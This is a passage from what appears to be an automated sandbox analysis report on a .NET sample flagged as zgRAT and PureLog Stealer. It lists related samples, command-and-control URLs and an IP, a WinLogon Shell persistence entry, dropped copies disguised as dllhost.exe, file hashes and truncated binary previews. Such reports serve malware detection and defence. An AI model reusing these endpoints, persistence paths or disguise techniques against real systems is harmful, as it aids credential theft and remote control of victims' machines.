                                                      18:24:18AutostartRun: WinLogon Shell "C:\Users\user\Desktop\PlZA6b48MW.exe"

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37.44.238.250r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                      cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • whware.top/RequestLowGeoLongpollWordpress.php
                                                      vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                      8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 703648cm.renyash.top/provider_cpugame.php
                                                      4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                      Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                      4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 143840cm.nyashteam.ru/DefaultPublic.php
                                                      s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                      QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                      • 117813cm.n9shteam.in/ExternalRequest.php
                                                      EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php

                                                      Domains

                                                      No context

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      HARMONYHOSTING-ASFRr6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 37.44.238.250
                                                      cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 37.44.238.250
                                                      vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 37.44.238.250
                                                      dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 37.44.238.94
                                                      dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 37.44.238.94
                                                      dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 37.44.238.94
                                                      dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 37.44.238.94
                                                      8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 37.44.238.250
                                                      roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 37.44.238.73
                                                      roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 37.44.238.73

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\Desktop\CwRRQJIe.logwxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                          Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    onlysteal.exeGet hashmaliciousDCRatBrowse
                                                                      t8F7Ic986c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.

                                                                          C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\bddb3c02ebef1e

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (595), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):595
                                                                          Entropy (8bit):5.894527432325272
                                                                          Encrypted:false
                                                                          SSDEEP:12:6nQhLVW/ia4SMpMjBTc1vOV1BWqO4C+S8lSv1Ge2MDU/IXWaiqz:8QhLV4iBUj2cWP4C+Uv1wyZV
                                                                          MD5:BDC8C10DCBD81A59D67EEAAB407CABDD
                                                                          SHA1:65EBA0977142706166F3918E3D15AB2C332D7654
                                                                          SHA-256:D2603190407FE0269BDF39033D221D7143ABDE184323EDCEAB677DE7B43B5D60
                                                                          SHA-512:FE490D138922720701D728CA372E9325074468F1A1C1D2C3BEC1BCBC1EC1E6896649D1922DF6DA7C5DDA27BC3C98F1999EA8D1F1E8554263DF541190763FFF3D
                                                                          Malicious:false
                                                                          Preview:z4pFvnn8LsfUOTM8zDbQuWElQXlCjXmYjCS9f78Vh3TsdJRxwQvhvn0d0DzXBkZyGHvLAMc1FGs0DVIGGyQSmFm5MzJcHlT7eemWYFwky3cp49Ze5sQNUGMAez9LDAudwvViswsBBpesn7BMZogYUFmYSm2iFlhxJ82Jn1wIAPMoldXgywvYdVJrI7QG4J5aIrjpE2ji2YXE38wzOVtTzITxyLAqlpO1Tvf43sc6NNgF7ExKKb1jZmkAXv02137MKgvIc25g3xFmlO0tYzfKxobqKegH1jEUPU5aTpsSfVpmg8YJ5GeCXxYfFE77VxoUsvWRTaasGNoc8yKMGXMuEB6c5ZVOsu6srV4vlGzeqv5KJ6gQ4u17k3Pqz4W3FLAWQ5un4Zk9irESGvT93EU738HyFO5ru5Zfvj4NL3WfK1Z2z7kDkWAA0DdRx6hpd3OmSjhg1FxArzxBjP8Io2GX5ZorGmZPVqCQnxkPaDLfjASBQbsi7ZBkx0q24zaOqhoAxgYvosskqly4Gmbo41R6pbdwGrVkm6yBWSOtD63Oqa4LCwwRYvUyQrVWClp7XH7twwiyYrl87CPOgRtU5DM

                                                                          C:\Program Files\Windows Multimedia Platform\5940a34987c991

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (873), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):873
                                                                          Entropy (8bit):5.892287647303796
                                                                          Encrypted:false
                                                                          SSDEEP:24:3Ph92ZA11GwFBB9XCYiO6/umT1v3hFXDxRyFXfjP1mwa:3Z92wGuBBJCYw/umT9HYXfjNm7
                                                                          MD5:8712B67DB7AEB6EEB41EA8CF00C07DBA
                                                                          SHA1:087308256FC1FB6816BC7C153223B4D7DE745B2B
                                                                          SHA-256:61746BF6A2FC1E3D119365883380D3BCE7352A024DB7BF34BE9508697FD2C7C4
                                                                          SHA-512:EA3FEB2D1DCCA67A4E6A75F48FEC617307420F1F76FEC1289BBF8CFF17946B3EF0E47C2C5492B98619757FA3882DE4AFE75BBB72E75FFF2BE6806B22A1DD5391
                                                                          Malicious:false
                                                                          Preview:MLkRQOVXeXVso3z5oZ15a9LHHJPOOUqJDIo5yNWETV7UwgarlOfAz7bNAdKG9HJJrLpfO3HbDwlFB1Ukshn9yqUFrb5UCQFMMxml05drHE6CVWLIIjXbdJUB1jyw7wYxrZ3OOttxD51utSuUPwMc2nsCcltQGrtVpJU5d74Y0jYhSkRizegLj54Dr0vm9crWMgEj7z1S2xmTPKt2ULbmKiwtPQOmMSZX1BVwfrlAnOSvTlygH2SyAFMntVUqkOFjYObNz7Xmjb95PAaocsfUAkWwzrCKW4ZYJsWEJkqJepOjFRYt4qO2tvjy2oYI5NPpCkwgnVe1BVzUWxqhTSPqqhpYJiMeLiOQZjhff1FiMW0X5PcE81ym8j9f5XXFJ9pdHi4wQLCcNqdTqSd4GHgUumS0kCkHdAZMqXQWUpywyWZRFpym4d8BdUteQEMOk58MRRmTBGjbTtgXNAu4N7MABYsVovFQcjL3XMAyCfly3hrtyVRPTRAns8K3iQoQAT8uhmAAA62rWYGeq9hSd06KiiKYBHPv0Uxki7LLVQPWZSRT2qMjtVwKWxL9bl92qG1Blf5sxV7NljvPR1gU5qCfimNuwLttRWqSbPsWudvYXjjxC5skEo7AEWc8SK6llO5O3cyBIKkb4nH9Das0dIomZpNFxtEjhJwJnU3jHrc4EgFaOc51cFIcjTzOOsOYFA3v17WshJtwqui3jx0UyMHbBTkTfpUZcDzDmUjQGMUSWWvzv6ob14k33btiXCM1zUTn4fQPOjNl1zFphuijA2hic5JLlA3D9ccBCI4PpZNRq8BEVEAnen17wuK8VFnNqKlZWEmZ0S3kpP2d4FzgAPjWlfOS754kv9kgXlsRblxLt

                                                                          C:\Program Files\Windows Multimedia Platform\dllhost.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.

                                                                          C:\Program Files\Windows Multimedia Platform\dllhost.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Recovery\5915f7c410c8eb

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):77
                                                                          Entropy (8bit):5.422376800322775
                                                                          Encrypted:false
                                                                          SSDEEP:3:Knq6xh2IxEoSQdUq8yjVORp9YD9mn:KnPvx1dUqBOP9Ycn
                                                                          MD5:397643F97A8B90C572DABAD73F57F2D8
                                                                          SHA1:8910825F30EFB876D8C98607B56E33BC4B7614B1
                                                                          SHA-256:89074F0F3FC0C1D91B1B3047EAB59028A1F84C4B8E3EA09BC332C68AF59AF406
                                                                          SHA-512:2EF16DE35645CB4E7670F49FE768A63DEC7800D54AC2569099B21CDD8982E40197455A70F5A7EB76A5A5E4A0E2A2467E5D6FF614CB8BD19CE0DF71E53F090332
                                                                          Malicious:false
                                                                          Preview:QPHNakPx0zUb4YTzppWGSWiFYcXnUNraQ1oUowJ5Hx1bGJ2xZbm1fkv3rBy7MmdnI4LDt8K2fb8ef

                                                                          C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.

                                                                          C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Users\Default\AppData\Roaming\5915f7c410c8eb

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (558), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):558
                                                                          Entropy (8bit):5.8812755776393475
                                                                          Encrypted:false
                                                                          SSDEEP:12:np9joInXFHnU1a+lRybg3xKTMmxmKFce3Dib7:npKgXpUh1cTMmwY73O7
                                                                          MD5:CF50F440774CE407B0E6B1164C9C4F54
                                                                          SHA1:F7892D8846028500FB09834C097387ED7CAADAFE
                                                                          SHA-256:59EBD12DD3F1AE7AD8F1D99CDCE018A199134770B0B0A5A15B7F11A76346A016
                                                                          SHA-512:7B8760EEB7F4A391C267C6BBA6C12858CEF0629908A3B53FDD6BBFEB04A329E24239BD045A9ED3D9A91D31880514B3ADC7C4F0CF547E774DDC81A8E40113A129
                                                                          Malicious:false
                                                                          Preview:CE4weYoDrD9z4Lf8N0DEHQ6lmhXsENfxtRFxvekljs678FUdvfakOAbwISK6A68dhLFmFrNtPceYT8ngN46jx5it0TpdTnkntdZwArXESqUwfCcJpotGAZplmWvvBuZm11p0i0gfg1RGlwNy1gxp4dmUxxKo6lChRs5oXmkyHOkIIiA0I74f6tsXPUCvq1i4ztz31jbP69hp3eMPxTf8rhlh9hYCjzHQpqTYsG9jfpi6LCeuIw7WWkMRHR3TKZpG1RAMLxgqU5cC8oW7Co3w1u3FdBQbNpZG9cF3CRjVQRCaHKSc56Qgf2PGY5sJgFdogWCgjc5uEigksc7TsxfRZ2kHN8fHiayLxX4vIw3dAfb7WoY57ZasjMPnv4Tl7yMnuVxUiML64BQ3bnvijjJJ9FllIQANcSgMTyNA1EXuOeyh6WMHJuBXoCnotLMRM7dmfDjmaurfLZ4fQDpvE2DsQIiQKiRp1GiQAMC2wjrZCfMOIHXqfaMT4vVXeSc1dBnE0nfEBw8eLopu6TICKkJb3PWP0pYeG05A1HYemTptbsHPFk

                                                                          C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.

                                                                          C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PlZA6b48MW.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1396
                                                                          Entropy (8bit):5.350961817021757
                                                                          Encrypted:false
                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                          Malicious:true
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WtHZilDMhVnOIkoIfPBLn.exe.log

                                                                          Download File
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1613
                                                                          Entropy (8bit):5.370675888495854
                                                                          Encrypted:false
                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                                          MD5:5ACBB013936118762389287938AE0885
                                                                          SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                                          SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                                          SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
